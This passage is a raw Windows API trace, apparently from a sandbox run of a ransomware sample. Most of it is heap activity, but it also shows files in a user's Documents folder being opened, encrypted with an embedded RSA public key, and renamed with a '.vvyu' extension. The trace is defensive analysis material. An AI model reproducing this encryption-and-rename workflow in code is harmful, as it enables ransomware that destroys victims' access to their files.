RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.661] GetCurrentThreadId () returned 0x66c [0193.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657300 [0193.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6572d0 [0193.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0193.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657270 [0193.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0193.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6572b8 [0193.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657228 [0193.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0193.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6573d8 [0193.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657210 [0193.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x669ac0 [0193.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0193.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657210 [0193.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6573d8 | out: hHeap=0x620000) returned 1 [0193.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0193.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572d0 | out: hHeap=0x620000) returned 1 [0193.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x6572d0 [0193.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea0a68 [0193.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657300 | out: hHeap=0x620000) returned 1 [0193.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0193.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x669ac0 | out: hHeap=0x620000) returned 1 [0193.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea0c78 [0193.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0193.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0193.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572d0 | out: hHeap=0x620000) returned 1 [0193.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea0e90 [0193.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0193.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0c78 | out: hHeap=0x620000) returned 1 [0193.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e90 | out: hHeap=0x620000) returned 1 [0193.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0193.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657228 | out: hHeap=0x620000) returned 1 [0193.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572b8 | out: hHeap=0x620000) returned 1 [0193.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0193.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0193.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x658268 | out: hHeap=0x620000) returned 1 [0193.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0193.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0193.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0193.673] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x17784, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x17784, lpOverlapped=0x0) returned 1 [0193.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0193.674] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x17789, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.674] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0193.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0193.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea0a68 [0193.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea0a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea0e98 [0193.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.676] WriteFile (in: hFile=0x568, lpBuffer=0x2ea0e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea0e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e98 | out: hHeap=0x620000) returned 1 [0193.676] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.676] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.677] CloseHandle (hObject=0x568) returned 1 [0193.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0193.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea0a68 [0193.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0193.679] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\dnScTZWStNYxBfiQs.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\dnsctzwstnyxbfiqs.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\dnScTZWStNYxBfiQs.docx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\dnsctzwstnyxbfiqs.docx.vvyu")) returned 1 [0193.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.681] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0193.684] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebdc3c0, ftCreationTime.dwHighDateTime=0x1d81bce, ftLastAccessTime.dwLowDateTime=0xdfe20db0, ftLastAccessTime.dwHighDateTime=0x1d840e2, ftLastWriteTime.dwLowDateTime=0xdfe20db0, ftLastWriteTime.dwHighDateTime=0x1d840e2, nFileSizeHigh=0x0, nFileSizeLow=0x912a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DygX.docx", cAlternateFileName="DYGX~1.DOC")) returned 1 [0193.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x658268 [0193.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb4658 [0193.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x658268 | out: hHeap=0x620000) returned 1 [0193.684] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\DygX.docx") returned=".docx" [0193.684] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\DygX.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\dygx.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.685] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=37162) returned 1 [0193.685] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0193.689] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x9104, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.689] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.692] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.692] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x912a, lpOverlapped=0x0) returned 1 [0193.693] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.693] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.693] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.693] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.694] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.694] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.694] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.694] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.694] GetLastError () returned 0x0 [0193.695] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.695] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.695] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.695] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.695] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9130) returned 0x2ea79b0 [0193.696] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x658268 [0193.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93840 [0193.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0a80 [0193.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93828 [0193.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x669ac0 [0193.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6572b8 [0193.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657270 [0193.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.697] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea1a68 [0193.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x669ac0 | out: hHeap=0x620000) returned 1 [0193.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572b8 | out: hHeap=0x620000) returned 1 [0193.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a68 | out: hHeap=0x620000) returned 1 [0193.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6572b8 [0193.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0193.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657270 [0193.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x657228 [0193.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0193.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0193.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0193.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0193.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657228 | out: hHeap=0x620000) returned 1 [0193.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.700] HeapFree (in: 